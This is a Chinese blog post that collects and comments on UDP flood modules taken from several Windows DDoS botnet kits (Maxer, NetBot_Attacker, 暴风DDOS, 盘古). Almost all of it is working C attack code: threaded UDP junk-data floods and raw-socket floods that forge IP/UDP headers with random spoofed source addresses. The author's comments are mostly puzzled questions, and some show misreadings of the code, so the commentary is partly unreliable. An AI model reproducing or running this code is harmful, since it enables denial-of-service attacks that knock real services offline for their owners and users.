对现有的所能找到的DDOS代码(攻击模块)做出一次分析----UDP篇

最新推荐文章于 2024-08-01 15:25:56 发布
最新推荐文章于 2024-08-01 15:25:56 发布
阅读量1.3k 收藏
点赞数
分类专栏: 网络编程

//=========================================

对现有的所能找到的DDOS代码(攻击模块)做出一次分析----UDP
文章作者:alalmn—飞龙
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
分析者:alalmn—飞龙       BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵

UDP攻击主要分为2
1.发送垃圾数据攻击
2.自己构造虚假IP进行攻击

UDP攻击并没有象TCP一样使用并发连接攻击
应为UDP是无连接数限制的
TCP是有连接数限制的

有个很多错的要提下随机生成垃圾数据这点很不错在看TCP的时候就发现这点了

------有奖知识问答------
//
Maxer.h
//判断是否支持RAW    RAW是什么东西 啊 我看它的代码是判断操作系统版本的是否支持的!!!!!知道到底什什么的可以告诉俺一下
//RAW UDP攻击
我看这个的判断条件是判断操作系统版本 这个和操作系统版本有关系吗
版本的区别,WSA开头的函数是2.0的,其他的是1.1的,   
2.0的用winsock2.h   
1.0的用winsock.h   
是选1   否选2     不祥选3   知道正确答案直接回答
//
知道答案的请发我QQ邮箱316118740@qq.com



//=================================================

冷风的.h

/************************UDP ATTACK***********************************/
unsigned long CALLBACK UDP_flood(LPVOID dParam)    //UDP发送垃圾信息攻击
{
SOCKADDR_IN sockAddr; //IP信息结构
SOCKET m_hSocket; //套接字
int nSent;
int nSize = strlen(icmpBuffer); //发送的内容

m_hSocket =socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); //创建socket   IPPROTO_UDP是创建UDP
                  //地址族   socket类型 协议类型
memset(&sockAddr,0,sizeof(sockAddr));   //内存空间初始化
sockAddr.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET
sockAddr.sin_port=htons(DdosPort); //存储端口号(使用网络字节顺序)
sockAddr.sin_addr.S_un.S_addr=resolve(DdosUrl); //将网络地址转换成IP地址

while(!StopDDosAttack) //是否在攻击状态
{
   nSent =sendto(m_hSocket, icmpBuffer, nSize, 0,        (LPSOCKADDR)&sockAddr, sizeof(sockAddr)); //向一指定目的地发送数据
            //套接口    数据缓冲区 数据长度 调用标志位 目的套接口的地址     所指地址的长度
   if(nSent == SOCKET_ERROR) //是否发送成功
    break;
   Sleep(100); //暂停(毫秒)
}

return 1;
}

//=============================================

Maxer.h

//标准UDP攻击
DWORD WINAPI UdpFlood(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam;   //攻击结构体
DDOSINFO ddosinfo; //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存

char senddata[1024];
memset(senddata,'A',1024);//内存空间初始化
int sendsize=strlen(senddata);//计算发送的内容

WSADATA               WSAData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2) ,&WSAData);//确定SOCKET版本

SOCKADDR_IN udpaddr;//IP信息结构

udpaddr.sin_family=AF_INET;//sin_family 地址家族(必须是AF_INET
    udpaddr.sin_addr.s_addr=resolve(ddosinfo.addr);//将网络地址转换成IP地址
    udpaddr.sin_port=htons(ddosinfo.port);//存储端口号(使用网络字节顺序)

SOCKET s=socket(AF_INET,SOCK_DGRAM,0); //奇怪这个创建socket   他没有选择UDP协议这算什么UDP攻击啊

//为了减小CPU的利用率,禁止在socket上将数据发送到缓冲。设置SO_SNDBUF0,
//从而使winsock直接发送数据到客户端,而不是将数据缓冲才发送。
int nZero = 0;
setsockopt(s,SOL_SOCKET,SO_SNDBUF,(char *)&nZero,sizeof(nZero)); //设置套接口的选项

while(1) //死循环
{
   if(IsStop==1) //是否在攻击状态
   {
    ExitThread(0);
    return 0;
   }
   for(int a=0;a<12;a++)
    sendto(s,senddata,sendsize,0,(SOCKADDR *)&udpaddr,sizeof(udpaddr)); //向一指定目的地发送数据
   Sleep(20); //暂停(毫秒)
}

}//-----------------------------------------------------------------------
typedef struct _iphdr     //ip

unsigned char h_verlen;    //4位首部长度+4IP版本号 
unsigned char tos;     //8位服务类型TOS 
unsigned short total_len;   //16位总长度(字节) 
unsigned short ident;    //16位标识 
unsigned short frag_and_flags; //3位标志位 
unsigned char ttl;     //8位生存时间TTL 
unsigned char proto;    //8位协议号(TCP, UDP 或其他
unsigned short checksum;   //16IP首部校验和 
unsigned int sourceIP;    //32位源IP地址 
unsigned int destIP;    //32位目的IP地址 
}IP_HEADER;
typedef struct udp_hdr //UDP首部
{
unsigned short sourceport; //本机或伪造的端口
unsigned short destport; //攻击的IP端口
unsigned short udp_length; //UDP地址长度
unsigned short udp_checksum; //UDP首部校验和
} UDP_HEADER;
//判断是否支持RAW    RAW是什么东西 啊 我看它的代码是判断操作系统版本的是否支持的!!!!!知道到底什什么的可以告诉俺一下
//RAW UDP攻击
//版本的区别,WSA开头的函数是2.0的,其他的是1.1的,   
//2.0的用winsock2.h   
//1.0的用winsock.h   
DWORD WINAPI RawUdpFlood(LPVOID dParam)
{
srand((unsigned)time( NULL ));

PDDOSINFO pddosinfo = (PDDOSINFO)dParam;   //攻击结构体
DDOSINFO ddosinfo;   //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存

IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int nBufferSize=1024;
char pSendBuffer[1024]={0};
memset(pSendBuffer,'A',1024);//内存空间初始化
WSADATA               WSAData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2) ,&WSAData);//确定SOCKET版本

SOCKADDR_IN udpaddr;//IP信息结构
SOCKET sendSocket;//套接字
udpaddr.sin_family=AF_INET;//sin_family 地址家族(必须是AF_INET
udpaddr.sin_addr.s_addr=resolve(ddosinfo.addr);//将网络地址转换成IP地址
udpaddr.sin_port=htons(ddosinfo.port);//存储端口号(使用网络字节顺序)

if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) //创建一个与指定传送服务提供者捆绑的套接口
{ //地址族描述目前仅支持PF_INET格式    新套接口的类型描述 协议   指向结构的指针    套接口组的描述字   套接口属性描述      //INVALID_SOCKET发生错误
   printf("Socket Setup Error...\n"); //Socket安装程序错误
   return 0; 

BOOL               flag=1; 
if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时
{ //套接口的描述字   选项定义的层次 需设置的选项 存放选项值的缓冲区 缓冲区的长度      //SOCKET_ERROR创建错误
   printf("Setsockopt IP_HDRINCL Error...\n");   //Setsockopt IP_HDRINCL错误
   return 0; 
}

int timeout = 3000; 
if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR) 

   printf("Setsockopt SO_SNDTIMEO Error...\n"); //Setsockopt SO_SNDTIMEO错误
   return 0; 
}

char         src_ip[20] = {0};

while(1) //死循环
{
   if(IsStop==1) //是否在攻击状态
   {
    ExitThread(0);
    return 0;
   } 
   for(int a=0;a<24;a++)
   {
    int iTotalSize=sizeof(ipHeader) + sizeof(udpHeader)+ nBufferSize;
    wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );   //格式化数据
    //填充IP首部 
    ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
    ipHeader.tos=0;
    ipHeader.total_len=htons(iTotalSize);
    ipHeader.ident=0;
    ipHeader.frag_and_flags=0;
    ipHeader.ttl=128;
    ipHeader.proto=IPPROTO_UDP;
    ipHeader.checksum=0;
    ipHeader.sourceIP=inet_addr(src_ip);//32位源地址 随机IP
    ipHeader.destIP=resolve(ddosinfo.addr); //IP
    //填充UDP首部
    udpHeader.sourceport = htons( rand()%60000 + 1 );
    udpHeader.destport = htons(ddosinfo.port);
    udpHeader.udp_length = htons(sizeof(udpHeader) + nBufferSize);
    udpHeader.udp_checksum = 0;

    memcpy(pSendBuffer, &ipHeader, sizeof(ipHeader));//复制数据
    memcpy(pSendBuffer+sizeof(ipHeader), &udpHeader, sizeof(udpHeader));//复制数据
    udpHeader.udp_checksum = checksum( (USHORT *) pSendBuffer, sizeof(udpHeader)+sizeof(ipHeader));
    sendto(sendSocket, pSendBuffer, sizeof(ipHeader) + sizeof(udpHeader) + sizeof(pSendBuffer), 0, (struct sockaddr*)&udpaddr, sizeof(udpaddr)); //向一指定目的地发送数据
    //套接口的描述字   待发送数据的缓冲区   缓冲区中数据的长度   调用方式标志位   指向目的套接口的地址   所指地址的长度
   }
   Sleep(40);
}

}

//===================================================

NetBot_Attacker.h

/************************UDP ATTACK***********************************/
unsigned long CALLBACK UDP_flood(LPVOID dParam)//udp flood UDP发送垃圾数据
{
WSADATA               WSAData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2) ,&WSAData);//确定SOCKET版本
SOCKADDR_IN sockAddr;//IP信息结构
SOCKET m_hSocket;//套接字
int nSent;
int nSize = strlen(icmpBuffer);//计算发送的内容

m_hSocket =socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);//创建socket
memset(&sockAddr,0,sizeof(sockAddr));//内存空间初始化
sockAddr.sin_family = AF_INET;//sin_family 地址家族(必须是AF_INET
sockAddr.sin_port=htons(fuckweb.FuckPort);//存储端口号(使用网络字节顺序)
sockAddr.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP); //将网络地址转换成IP地址

while(!stopfuck)
{
   nSent =sendto(m_hSocket, icmpBuffer, nSize, 0, (LPSOCKADDR)&sockAddr, sizeof(sockAddr)); //向一指定目的地发送数据
   if(nSent == SOCKET_ERROR) //是否发送成功
    break;
   Sleep(40); //延时
}

return 1;
}



unsigned long CALLBACK Pjam_attack(LPVOID dParam)//udp 小包裹
{
WSADATA wsadata;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,0), &wsadata);//确定SOCKET版本
SOCKADDR_IN sockAddr;//IP信息结构
SOCKET m_hSocket;//套接字

memset(&sockAddr,0,sizeof(sockAddr));//内存空间初始化
sockAddr.sin_family = AF_INET;//sin_family 地址家族(必须是AF_INET
sockAddr.sin_port=htons(fuckweb.FuckPort);//存储端口号(使用网络字节顺序)
sockAddr.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP); //将网络地址转换成IP地址

m_hSocket= socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);//创建socket
connect(m_hSocket,(SOCKADDR*)&sockAddr, sizeof(sockAddr)); // connect in udp? //连接
  
while(!stopfuck)
{
   send(m_hSocket,"fuckwebfuckwebfuckwebfuckwebfuckwebfuckwebfuckweb",50,0); //发送消息
   Sleep(40); //延时
}
return 1;
}

//===================================

暴风DDOS.h

#define nBufferSize 1024
static char pSendBuffer[nBufferSize+60];
static int iTotalSize=0;

/*===========================================常量=============================================*/
typedef struct _iphdr
{
unsigned char   h_verlen;
unsigned char   tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char   ttl;
unsigned char   proto;
unsigned short checksum;
unsigned int    sourceIP;
unsigned int    destIP;
}IP_HEADER, * PIP_HEADER;

typedef struct udp_hdr //UDP首部
{
unsigned short sourceport; 
unsigned short destport; 
unsigned short udp_length; 
unsigned short udp_checksum; 
} UDP_HEADER;

void udp_flood() 
{
Sleep(2000);    //暂停(毫秒)
WSADATA WSAData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2), &WSAData); //确定SOCKET版本

SOCKET    SendSocket; 
BOOL    Flag;

SendSocket = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0); //创建一个与指定传送服务提供者捆绑的套接口
if( SendSocket == INVALID_SOCKET )   //INVALID_SOCKET发生错误
   return;

Flag=true;
if (setsockopt(SendSocket,IPPROTO_IP,IP_HDRINCL,(char*)&Flag,sizeof(Flag))==SOCKET_ERROR) //设置套接口的选项
{
   printf("setsockopt Error!\n"); //setsockopt错误!
   return;
}

SOCKADDR_IN addr_in;    //IP信息结构
addr_in.sin_family=AF_INET;    //sin_family 地址家族(必须是AF_INET
addr_in.sin_port=htons(tgtPort); //存储端口号(使用网络字节顺序)
addr_in.sin_addr.s_addr=inet_addr(tgtIP); //inet_addrip地址转换成网络地址
if (addr_in.sin_addr.s_addr == INADDR_NONE)
{   //inet_addrip地址转换成网络地址 IP地址不正确返回INADDR_NONE
   struct hostent *hp = NULL; //hostent IP信息结构体
   if ((hp = gethostbyname(tgtIP)) != NULL)
   {//gethostbyname主机信息 tgtIPIP地址   != NULL不等于空
   memcpy(&(addr_in.sin_addr), hp->h_addr, hp->h_length); //复制内存
   addr_in.sin_family = hp->h_addrtype;
   }
   else
    return;
}

for (;;)
{
   if (StopFlag == 1) //是否在攻击状态
   {
    ExitThread(0);
    return;
   }
   sendto(SendSocket, pSendBuffer, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in)); //向一指定目的地发送数据
   //pSendBuffer 把数据结构体都保存进去了 这样才能实现伪IP攻击
   Sleep(SleepTime);
}
closesocket(SendSocket); //关闭socket
return; 
}

void fill_udp_buffer()
{
WSADATA wsaData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2, 2), &wsaData); //确定SOCKET版本
unsigned int saddr=0;
char hostname[MAX_PATH];
gethostname(hostname,MAX_PATH); //得到主机名
LPHOSTENT lphost; //主机结构信息 
lphost = gethostbyname(hostname);//主机名的主机信息
if (lphost != NULL)
   saddr = ((LPIN_ADDR)lphost->h_addr)->s_addr;

char pBuffer[nBufferSize];

IP_HEADER ipHeader;
UDP_HEADER udpHeader;

int iUdpCheckSumSize;
char *ptr=NULL;
FillMemory(pBuffer, nBufferSize, 'A'); //填充内容做攻击数据使用

iTotalSize=sizeof(ipHeader) + sizeof(udpHeader)+ nBufferSize;

ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(tgtIP); //IP 
//UDP首部
udpHeader.sourceport = htons(5444);//本机或伪造的端口
udpHeader.destport = htons(tgtPort);//攻击的IP端口
udpHeader.udp_length = htons(sizeof(udpHeader) + nBufferSize);//UDP地址长度
udpHeader.udp_checksum = 0;

ptr = NULL;
ipHeader.sourceIP = saddr; //自己模拟的IP

ZeroMemory(pSendBuffer, nBufferSize + 60); //填充内容做攻击数据使用
ptr = pSendBuffer;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;

memcpy(ptr, &ipHeader.sourceIP, sizeof(ipHeader.sourceIP));
ptr += sizeof(ipHeader.sourceIP);
iUdpCheckSumSize += sizeof(ipHeader.sourceIP);

memcpy(ptr, &ipHeader.destIP, sizeof(ipHeader.destIP));    //IP
ptr += sizeof(ipHeader.destIP);    //IP
iUdpCheckSumSize += sizeof(ipHeader.destIP);   //IP //这些代码在这里给数据相加 是用来做什么做攻击内容使用吗

ptr++;
iUdpCheckSumSize++;

memcpy(ptr, &ipHeader.proto, sizeof(ipHeader.proto));
ptr += sizeof(ipHeader.proto);
iUdpCheckSumSize += sizeof(ipHeader.proto);

memcpy(ptr, &udpHeader.udp_length, sizeof(udpHeader.udp_length));
ptr += sizeof(udpHeader.udp_length);
iUdpCheckSumSize += sizeof(udpHeader.udp_length);

memcpy(ptr, &udpHeader, sizeof(udpHeader));
ptr += sizeof(udpHeader);
iUdpCheckSumSize += sizeof(udpHeader); //这些代码在这里给数据相加 是用来做什么做攻击内容使用吗

memcpy(ptr, pBuffer, nBufferSize);
iUdpCheckSumSize += nBufferSize;   

udpHeader.udp_checksum=checksum((USHORT*)pSendBuffer,iUdpCheckSumSize);
memcpy(pSendBuffer, &ipHeader, sizeof(ipHeader));
memcpy(pSendBuffer + sizeof(ipHeader), &udpHeader, sizeof(udpHeader));
memcpy(pSendBuffer + sizeof(ipHeader) + sizeof(udpHeader), pBuffer, nBufferSize);    //这些代码在这里给数据相加 是用来做什么做攻击内容使用吗
}
/*--------------------------------------------------------------------------------------*/
void StartUDP(char ip[30],int port,int time,int xc)
{

   if (inet_addr(ip)== INADDR_NONE)
   {//inet_addrip地址转换成网络地址   INADDR_NONE非法地址
    struct hostent *hp = NULL; //hostent IP信息结构体
    if ((hp = gethostbyname(ip)) != NULL) //gethostbyname主机信息
    {
     in_addr in; //IP地址转换位一个in_addr结构的地址
     memcpy(&in, hp->h_addr, hp->h_length); //复制内存
     strcpy(tgtIP,inet_ntoa(in)); //复制数据
    }
   }
   else
    strcpy(tgtIP,ip); //复制数据


   port=tgtPort;   //端口
   time=timeout;   //时间

   if (StopFlag == -1) //这点应该查看是否在攻击状态
    return;

   StopFlag=-1;

   fill_udp_buffer();    //获取攻击数据

   for(i=0;i<xc;i++) //循环创建线程
   {
    h=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)udp_flood, NULL, 0, NULL); //具体攻击
   }
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL); //结束攻击线程
}

//======================================================

暴风DDOSVIP2010-225.h

//伪造源UDP(流量跟 非IP数据包(流量一样
/*----------------------------------------------------------------------------------------*///UDP(流量)
void udpattack()//UDP(流量)
{
char senddata[1024];
memset(senddata,'A',1024);   //内存空间初始化 初始化攻击数据
int sendsize=strlen(senddata);//计算字符长度

SOCKADDR_IN udpaddr; //IP信息结构

udpaddr.sin_family=AF_INET; //sin_family 地址家族(必须是AF_INET
    udpaddr.sin_addr.s_addr=inet_addr(tgtIP); //inet_addrip地址转换成网络地址
    udpaddr.sin_port=htons(tgtPort); //存储端口号(使用网络字节顺序)

SOCKET s=socket(AF_INET,SOCK_DGRAM,0); //创建socket 这样创建的应该不是UDP协议吧汗!!!!!!!

//为了减小CPU的利用率,禁止在socket上将数据发送到缓冲。设置SO_SNDBUF0,
//从而使winsock直接发送数据到客户端,而不是将数据缓冲才发送。
int nZero = 0;
setsockopt(s,SOL_SOCKET,SO_SNDBUF,(char *)&nZero,sizeof(nZero)); //设置套接口的选项


for (;;)
{
   if(StopFlag==1)//这点应该查看是否在攻击状态
   {
    ExitThread(0);
    return;
   }
   for(int a=0;a<12;a++)
    sendto(s,senddata,sendsize,0,(SOCKADDR *)&udpaddr,sizeof(udpaddr));//向一指定目的地发送数据
   Sleep(SleepTime);
}
closesocket(s); //关闭socket
WSACleanup(); //中止Windows Sockets DLL的使用 
}

void StartUDP(char ip[30],int port,int mytime,int xc) //UDP(流量)
{
   if (inet_addr(ip)== INADDR_NONE)
   {//inet_addrip地址转换成网络地址   INADDR_NONE非法地址
    struct hostent *hp = NULL; //hostent IP信息结构体
    if ((hp = gethostbyname(ip)) != NULL)//gethostbyname主机信息 IP IP地址   != NULL不等于空
    {
     in_addr in;
     memcpy(&in, hp->h_addr, hp->h_length); //复制内存
     strcpy(tgtIP,inet_ntoa(in)); //拷贝
    }
   }
   else
    strcpy(tgtIP,ip); //复制数据


   tgtPort=port; //端口 
   timeout=mytime; //时间
   StopFlag = -1;     //进入攻击状态
   for(z=0;z<xc;z++)
   {
    h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)udpattack, NULL, 0, NULL);   //具体攻击
   }
   if(timeout!=0)
   {
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL); //结束攻击线程
   }
}
/*--------------------------------------------------------------------------------------*/
/*--------------------------------------------------------------------------------------*/
void udpsattack() //UDP碎片(流量)
{
char senddata[5]="bfyl";

int sendsize=strlen(senddata);//计算字符长度

SOCKADDR_IN udpaddr; //IP信息结构

udpaddr.sin_family=AF_INET; //sin_family 地址家族(必须是AF_INET
udpaddr.sin_addr.s_addr=inet_addr(tgtIP); //inet_addrip地址转换成网络地址
udpaddr.sin_port=htons(tgtPort); //存储端口号(使用网络字节顺序)

SOCKET s=socket(AF_INET,SOCK_DGRAM,0); //创建socket 这样创建的应该不是UDP协议吧汗!!!

int nZero = 0;
setsockopt(s,SOL_SOCKET,SO_SNDBUF,(char *)&nZero,sizeof(nZero)); //设置套接口的选项

for (;;)
{
   if(StopFlag==1)//这点应该查看是否在攻击状态
   {
    ExitThread(0);
    return;
   }
   for(int i=0;i<5;i++)
    sendto(s,senddata,sendsize,0,(SOCKADDR *)&udpaddr,sizeof(udpaddr));//向一指定目的地发送数据
   Sleep(SleepTime);
}
closesocket(s); //关闭socket
WSACleanup(); //中止Windows Sockets DLL的使用 
}


void StartUDPS(char ip[30],int port,int mytime,int xc) //UDP碎片(流量)
{

if (inet_addr(ip)== INADDR_NONE)
{//inet_addrip地址转换成网络地址   INADDR_NONE非法地址
   struct hostent *hp = NULL; //hostent IP信息结构体
   if ((hp = gethostbyname(ip)) != NULL)//gethostbyname主机信息 IP IP地址   != NULL不等于空
   {
    in_addr in;
    memcpy(&in, hp->h_addr, hp->h_length); //复制内存
    strcpy(tgtIP,inet_ntoa(in)); //拷贝
   }
}
else
   strcpy(tgtIP,ip);


tgtPort=port;    //端口 
timeout=mytime; //时间 
StopFlag = -1;

for(z=0;z<xc;z++)
{
   h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)udpsattack, NULL, 0, NULL);//具体攻击
}
if(timeout != 0)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);//结束攻击线程
}
}
/*--------------------------------------------------------------------------------------*/
/*--------------------------------------------------------------------------------------*/
//变异和伪造的UDP发包
void rawudpattack() //IP数据包(流量)
{
WSADATA WSAData; //这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2), &WSAData); //确定SOCKET版本

SOCKET    SendSocket;   //套接字
BOOL    Flag;

SendSocket = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0); //创建一个与指定传送服务提供者捆绑的套接口
if( SendSocket == INVALID_SOCKET )    //INVALID_SOCKET发生错误
   return;

Flag=true;
if (setsockopt(SendSocket,IPPROTO_IP,IP_HDRINCL,(char*)&Flag,sizeof(Flag))==SOCKET_ERROR) //设置套接口的选项    //setsockopt错误
{
   printf("setsockopt Error!\n");
   return;
}

SOCKADDR_IN addr_in; //IP信息结构
addr_in.sin_family=AF_INET; //sin_family 地址家族(必须是AF_INET
addr_in.sin_port=htons(tgtPort); //存储端口号(使用网络字节顺序)
addr_in.sin_addr.s_addr=inet_addr(tgtIP); //inet_addrip地址转换成网络地址
if (addr_in.sin_addr.s_addr == INADDR_NONE)
{   
   struct hostent *hp = NULL;
   if ((hp = gethostbyname(tgtIP)) != NULL)
   {//gethostbyname主机信息 tgtIPIP地址   != NULL不等于空
    memcpy(&(addr_in.sin_addr), hp->h_addr, hp->h_length); //复制内存
    addr_in.sin_family = hp->h_addrtype;
   }
   else
    return;
}

for (;;)
{
   if (StopFlag == 1) //攻击状态
   {
    ExitThread(0);
    return;
   }
   for(int i=0;i<12;i++)
    sendto(SendSocket, pSendBuffer, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in));//向一指定目的地发送数据
   Sleep(SleepTime);
}
closesocket(SendSocket); //关闭socket
WSACleanup(); //中止Windows Sockets DLL的使用 
return; 
}

void StartBYUDP(char ip[30],int port,int mytime,int xc) //IP数据包(流量)
{

if (inet_addr(ip)== INADDR_NONE)
{
   struct hostent *hp = NULL; //hostent IP信息结构体
   if ((hp = gethostbyname(ip)) != NULL)
   {//inet_addrip地址转换成网络地址   INADDR_NONE非法地址
    in_addr in;
    memcpy(&in, hp->h_addr, hp->h_length); //复制内存
    strcpy(tgtIP,inet_ntoa(in)); //拷贝
   }
}
else
   strcpy(tgtIP,ip); //拷贝


tgtPort=port; //端口 
timeout=mytime; //时间
StopFlag = -1;
fill_BY_buffer();    //获取攻击数据和 暴风DDOS.h 文件是一样的

for(z=0;z<xc;z++)
{
   h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rawudpattack, NULL, 0, NULL);   //具体攻击
}
if(mytime!=0)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL); //结束攻击线程
}
}

/*--------------------------------------------------------------------------------------*/
/*--------------------------------------------------------------------------------------*/
void sjudpattack() //随机数据UDP(流量)
{
int i;

srand((unsigned)time( NULL ));


i=rand()%512;   //产生个随机数

char senddata[MAX_PATH];

memset(senddata,i,MAX_PATH); //内存空间初始化
int sendsize=1024;

SOCKADDR_IN udpaddr; //IP信息结构

udpaddr.sin_family=AF_INET;   //指代协议族,在socket编程中只能是AF_INET
udpaddr.sin_addr.s_addr=inet_addr(tgtIP);   //IP地址
udpaddr.sin_port=htons(tgtPort);   //存储端口号(使用网络字节顺序)

SOCKET s=socket(AF_INET,SOCK_DGRAM,0); //创建socket

int nZero = 0;
setsockopt(s,SOL_SOCKET,SO_SNDBUF,(char *)&nZero,sizeof(nZero));    //设置套接口的选项

for (;;)
{
   if(StopFlag==1)//这点应该查看是否在攻击状态
   {
    ExitThread(0);
    return;
   }
   for(int a=0;a<12;a++)
    sendto(s,senddata,sendsize,0,(SOCKADDR *)&udpaddr,sizeof(udpaddr));//向一指定目的地发送数据
   Sleep(SleepTime);
}
closesocket(s); //关闭socket
WSACleanup(); //中止Windows Sockets DLL的使用
}


void StartSJUDP(char ip[30],int port,int mytime,int xc) //随机数据UDP(流量)
{

if (inet_addr(ip)== INADDR_NONE)
{//inet_addrip地址转换成网络地址   INADDR_NONE非法地址
   struct hostent *hp = NULL; //hostent IP信息结构体
   if ((hp = gethostbyname(ip)) != NULL) //gethostbyname主机信息 IP IP地址   != NULL不等于空
   {
    in_addr in;
    memcpy(&in, hp->h_addr, hp->h_length); //复制内存
    strcpy(tgtIP,inet_ntoa(in)); //拷贝
   }
}
else
   strcpy(tgtIP,ip); //拷贝


tgtPort=port; //端口 
timeout=mytime; //时间
StopFlag = -1;

for(z=0;z<xc;z++)
{
   h[z]=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)sjudpattack, NULL, 0, NULL);   //具体攻击
}
if(timeout!=0)
{
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL); //结束攻击线程
}
}
/*--------------------------------------------------------------------------------------*/
/*--------------------------------------------------------------------------------------*/

//==================================================

盘古1.5代码.h

///UDP攻击
#define nBufferSize 1024
static char pSendBuffer[nBufferSize+60];
static int iTotalSize=0;

void udp_flood() //UDP攻击
{
Sleep(2000);
WSADATA WSAData;
WSAStartup(MAKEWORD(2,2), &WSAData);

SOCKET    SendSocket; 
BOOL    Flag;

SendSocket = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0); //创建一个与指定传送服务提供者捆绑的套接口
if( SendSocket == INVALID_SOCKET ) 
   return;

Flag=true;
if (setsockopt(SendSocket,IPPROTO_IP,IP_HDRINCL,(char*)&Flag,sizeof(Flag))==SOCKET_ERROR)    //设置套接口的选项
{
   printf("setsockopt Error!\n");
   return;
}

SOCKADDR_IN addr_in; //IP信息结构
addr_in.sin_family=AF_INET;
       //sin_family 地址家族(必须是AF_INET
addr_in.sin_port=htons(tgtPort);
addr_in.sin_addr.s_addr=inet_addr(tgtIP);
                       //inet_addrip地址转换成网络地址
if (addr_in.sin_addr.s_addr == INADDR_NONE)
                           //IP地址不正确返回INADDR_NONE
{   
   struct hostent *hp = NULL; //hostent域名转换成IP
   if ((hp = gethostbyname(tgtIP)) != NULL)
       //gethostbyname主机信息 tgtIPIP地址   != NULL不等于空
   {
   memcpy(&(addr_in.sin_addr), hp->h_addr, hp->h_length);
                                         //hp->h_length表示的是主机ip地址的长度
   addr_in.sin_family = hp->h_addrtype;
                      //hp->h_addrtype主机ip地址的类型是ipv4(AF_INET)还是ipv6(AF_INET6)
   }
   else
    return;
}

for (;;)
{
   if (StopFlag == 1) //StopFlag= 1; 表示没有在攻击
   {
    ExitThread(0);
    return;
   }
   for(int i=0;i<10000;i++)
    sendto(SendSocket, pSendBuffer, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in)); //向一指定目的地发送数据
   Sleep(SleepTime);
}
closesocket(SendSocket); //关闭SOCKET
return; 
}

//=======================================================

盘古DDOS优化版源码.h

///UDP
void udpflood()
{
WSAData wsadata;
WSAStartup(MAKEWORD(2,2),&wsadata);

char senddata[128];
memset(senddata,'D',sizeof(senddata)); //初始化攻击内容
int sendsize=strlen(senddata); //计算攻击内容

SOCKADDR_IN udpaddr;

udpaddr.sin_family=AF_INET;//sin_family 地址家族(必须是AF_INET
    udpaddr.sin_addr.s_addr=inet_addr(tgtip);//inet_addrip地址转换成网络地址
    udpaddr.sin_port=htons(tgtport); //端口

SOCKET s=socket(AF_INET,SOCK_DGRAM,0); //这样做创建的就不是UDP协议了啊

for (;;)
{
   if(Stop==1)
   {
    ExitThread(0);
    return;
   }
   for(int a=0;a<10000;a++)
    sendto(s,senddata,sendsize,0,(SOCKADDR *)&udpaddr,sizeof(udpaddr)); //向一指定目的地发送数据
   Sleep(20);
}
closesocket(s); //关闭SOCKET
WSACleanup(); //中止Windows Sockets DLL的使用 
}

//============================================================

H-KING
关注
专栏目录
DDoS攻击--Udp/Dns_query Flood攻击防护详解(UDP)
一只IT小小鸟
